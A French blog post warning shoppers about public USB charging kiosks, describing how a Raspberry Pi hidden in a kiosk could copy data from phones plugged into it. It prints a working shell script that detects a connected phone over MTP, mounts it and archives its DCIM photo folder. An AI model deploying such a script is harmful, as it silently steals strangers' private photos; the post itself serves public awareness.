[Hack] Méfiez vous des bornes de rechargement USB dans vos centres commerciaux

o-NON-MAIS-ALLO-QUOI-facebook

 

Bon début de semaine (ou mauvais)

 

Je parle là de mauvais, car c'est la pénurie ... pénurie qui impose des restrictions d'essence dans le meilleur des cas ... des stations vides dans le pire ...

 

Je n'ai pas pu aller à mon travail hier, faute d'essence, mais c'est bon j'ai fini par trouver un peu d'or noir, et donner à boire à ma voiture, dont la jauge voyait rouge ...

 

Je commence à rencontrer de plus en plus de borne de rechargement USB dans les centres commerciaux où je me promène ...
Nos précieux smartphones, à qui l'on demande monts et merveilles sont de plus en plus gourmands en matière de batterie pour pouvoir répondre à nos besoins ...

 

Nul doute que l'idée partait d'une bonne intention ...
Seulement ... voilà ...

Nous ne vivons pas dans le monde idyllique que vos parents vous ont vendu lorsque vous n’étiez encore qu'un jeune nourrisson ....

Des personnes mal intentionnées, peuvent profiter de ces espèces de placards ... où pleins de fils pendouillent, pour ajouter discrètement le leur ...

 

Capture0

Au moyen d'un simple raspberry, accroché dans le fond du rangement,  d'un simple cordon USB, votre smartphone va révéler tous ces secrets ...

Grâce à ce genre de script ...

#!/bin/sh

folder2mount="/tmp/toto"
folder2capture="DCIM"
folder2save="/tmp"
while [ 1 = 1 ]; do
	Check=`mtp-detect 2>&1 | grep Model | sed -e "s/Model\://g" | xargs`
	if [ "e$Check" != "e" ]; then 
		clear
		rm -rf $folder2mount
		mkdir $folder2mount
		chmod 777 $folder2mount 
		tmp=`mtpfs -o allow_other $folder2mount 2>&1` 
		echo "Capturing $Check ..."
		cd $folder2save
		tar -czf "capture.$Check\.tar.gz" $folder2mount/*/$folder2capture 2>&1 
		umount mtpfs
	fi
	sleep 2
done

 

 

Ainsi, une personne qui ne va pas faire attention, branchera son  téléphone au mauvais cordon USB, qui pompera toutes ses données dans le meilleur des cas ...

Dans le PIRE ...

 

Et bien votre Android en mode USB debug ou rooté, votre Iphone jailbreaké ?!?
Le hacker pourra directement installer et exécuter des programmes malveillants ...

 

Le conseil du jour étant :

Ne branchez jamais un téléphone, si vous ne savez pas sur quoi ?!?

Partagez ce contenu

3 comments

Laisser une réponse

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *